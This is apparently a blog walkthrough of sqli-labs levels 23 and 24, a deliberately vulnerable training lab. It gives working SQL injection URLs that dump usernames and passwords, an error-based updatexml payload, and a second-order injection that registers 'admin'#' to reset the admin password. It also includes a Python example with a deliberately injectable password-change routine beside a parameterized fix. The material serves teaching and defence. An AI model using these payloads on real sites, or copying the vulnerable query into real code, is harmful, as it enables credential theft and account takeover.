Sqli-Labs less23-24

less-23

 

Less-23 is much like Less-1, but reading the source code shows that --+ and # are both escaped, so they can no longer be used to comment out the rest of the query.

You can use a different comment sequence, ;%00, or close the statement with and / or instead.

Statement: http://192.168.5.100/sqli-labs/Less-23/?id=0' union select 1,2,group_concat(concat_ws('-',username,password)) from security.users ;%00 

 

Or with error-based injection: http://192.168.5.100/sqli-labs/Less-23/?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1

 

 

 

less-24 

Background: second-order injection

Second-order injection can be understood as follows: malicious data constructed by an attacker is stored in the database, and the injection happens when that data is later read back and placed into a SQL query. The defender may escape special characters when the user submits the malicious data, but the data is restored to its original form when it is written to the database. When the web application later reads the stored malicious data and executes a SQL query with it, second-order SQL injection occurs.

Second-order injection can be summarized in the following two steps:

Step one: insert the malicious data. When the data is inserted into the database, its special characters are escaped, but what is written to the database is the original data.

Step two: reference the malicious data. The developer assumes by default that data stored in the database is safe, so when running a query the malicious data is taken directly from the database and used without further checking or processing.

 

Learning link: https://www.cnblogs.com/cute-puli/p/11145758.html

 

Note: Less-24 has a duplicate file name problem that may occur when sqli-labs is set up on Windows with the phpstudy environment. After unpacking, the files need to be renamed before the level works.

 

 

How the second-order injection works: first register a malicious account named admin'# with the password 123.

 

 

Log in as the new user:

 

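Change the password to 123456. Note that the update now looks up the stored name admin'# taken from the database, which is not escaped, so the password that actually gets changed is admin's.

Logging in as admin now, the password has become 123456.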
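The two steps above, shown as an added example that is not part of the original post or of the sqli-labs code: a password-change routine that trusts the stored username, next to the parameterized fix. It assumes an in-memory SQLite table in place of the lab's MySQL database, so the constructed account name uses `--` where the page uses `#` (SQLite has no `#` comment); all function names are hypothetical.

```python
import sqlite3

# Constructed sample name. The page's MySQL lab uses admin'# ; SQLite has no
# '#' comment, so this example uses '--' instead (assumption of the example).
EVIL_USER = "admin'--"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'admin-secret')")
    return db

def register(db, username, password):
    # Step one: the insert is safe, and the database keeps the original
    # characters of the name, quote included.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def session_username(db, username):
    # At login the name is read back from storage and trusted from then on.
    row = db.execute("SELECT username FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row[0]

def change_password_vulnerable(db, stored_name, current, new):
    # Step two: request fields are escaped, the stored name is not.
    esc = lambda s: s.replace("'", "''")
    db.execute("UPDATE users SET password='" + esc(new) +
               "' WHERE username='" + stored_name +
               "' AND password='" + esc(current) + "'")

def change_password_fixed(db, stored_name, current, new):
    # Stored data is bound as a parameter like any other input.
    db.execute("UPDATE users SET password = ? WHERE username = ? AND password = ?",
               (new, stored_name, current))

def password_of(db, username):
    return db.execute("SELECT password FROM users WHERE username = ?",
                      (username,)).fetchone()[0]

def run(change_password):
    # Register, log in, change password; return (admin's, new user's) password.
    db = make_db()
    register(db, EVIL_USER, "123")
    name = session_username(db, EVIL_USER)
    change_password(db, name, "123", "123456")
    return password_of(db, "admin"), password_of(db, EVIL_USER)

if __name__ == "__main__":
    print("vulnerable:", run(change_password_vulnerable))
    print("fixed:     ", run(change_password_fixed))
```

With the vulnerable routine the update lands on admin's row and the current-password check is commented out; with the parameterized routine only the account that made the request is changed.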

 

 


Origin www.cnblogs.com/hzk001/p/12232537.html